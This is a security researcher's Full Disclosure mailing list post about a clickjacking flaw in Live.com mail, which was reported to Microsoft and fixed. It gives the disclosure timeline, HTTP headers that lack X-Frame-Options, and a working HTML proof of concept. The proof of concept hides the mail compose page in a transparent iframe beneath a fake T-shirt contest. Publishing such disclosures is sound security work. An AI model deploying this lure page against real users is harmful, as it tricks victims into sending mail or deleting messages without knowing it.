On 7/29/13 I've reported Live.com XFO vulnerability to the *Microsoft Security team* and finally their investigation came to conclusion and fixed the bug. So, Here is details of bug and timeline of fixing bug. A year ago on the weekend, I started digging into MS services for bugs.
The timeline of investigation of the bug : July 29, 2013 - April 16 , 2014. [image: Name: msresponse.jpg Views: 202 Size: 23.1 KB] The interesting part of the vulnerability all pages were protected for * UI Addressing Attack * and while doing testing, normally I test application on the all browsers. The weird part comes here, I was able to iframe the all the pages of Live.com including pre-authentication and post-authentication pages on Mozilla Firefox 3.6.28 to Mozilla Firefox 6. On Chrome and on other browser all pages functionality of XFO was working perfectly. Random announcement , nothing do with this post : Check out recorded video of Garage4Hackers Ranchoddas Webcast Series - Browser Crash Analysis By David Rude II aka Bannedit <https://www.youtube.com/watch?v=Qk0ORbFZ81I> Note : Have look the same vulnerability on Facebook Application Installing <http://www.garage4hackers.com/showthread.php?t=2528> Obviously , you must be thinking why this thing is happening with Mozilla. After doing some research and consulting with *G4H team* , I've concluded, it may be issue with *Gecko Engine*. The test environment was win 7 , ubuntu 10,11,12. Note : If you stumbled upon on the same issue of Gecko, then please do reply on this thread. Check out the following headers , XFO header is missing on Gecko/20120306 Firefox/3.6.28 to MF 6. Code: https://blu166.mail.live.com/m/?bfv=wm GET /m/?bfv=wm HTTP/1.1 Host: blu166.mail.live.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Encoding: gzip Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-Wlp-StartTime: 29-07-2013 10:10:32 AM xxn: 22 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" MSNSERVER: H: BLU166-W22 V: 17.1.6722.6001 D: 2013-07-22T22:56:20 X-Powered-By: ASP.NET Content-Length: 3113 Date: Mon, 29 Jul 2013 10:10:32 GMT Connection: keep-alive Set-Cookie: bfv=wm; domain=.live.com; path=/ Set-Cookie: widecontext=X; path=/; secure Set-Cookie: domain=.live.com; path=/ Set-Cookie: xidseq=7; domain=.live.com; path=/ Set-Cookie: LD=; domain=.live.com; expires=Mon, 29-Jul-2013 08:30:32 GMT; path=/ Cache-Control: no-cache, no-store, must-revalidate, no-transform Pragma: no-cache Expires: -1, -1 Here is some print screen of basic operations of live.com (I would like to remind you , every page of live.com was vulnerable ) Attacker developed this page to attack on victim. *Composing Email : * *Uploading Attachment : * *Deleting Emails : * [IMG]https://dl.dropboxusercontent.com/u/18007092/ms-click4.png[IMG] HTML POC , which i used sent to MS Security Team Code: <html> <!-- This Quick Developed POC , for testing purpose --!> <!-- Visit Garage4hackers.com --!> <head> <title> Live Mail Send Clickjacking - Garage4hackers.com </title> <style> iframe { width:800px; height:800px; position:absolute; top:0; left:0; filter:alpha(opacity=50); /* in real life opacity=0 */ opacity:0.5; } </style> </head> <body> <br> <br> <br> <br> <br> <br> <br> <br> <div><center>Bhag Milkha Bhag Competition</center></div> <center><b>Click Connect, You will Bhag Muilkha Bhag T-shirts. </b></center> <iframe src="https://blu166.mail.live.com/m/compose.m/?fid=00000000-0000-0000-0000-000000000001&to=sandeepk.l...@gmail.com"></iframe> <a href="http://www.google.com" target="_blank" style="position: relative; left: 0px; top: 220px; z-index: -1;">Connect</a> </body> </html> - [S] Garage4hackers.com _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/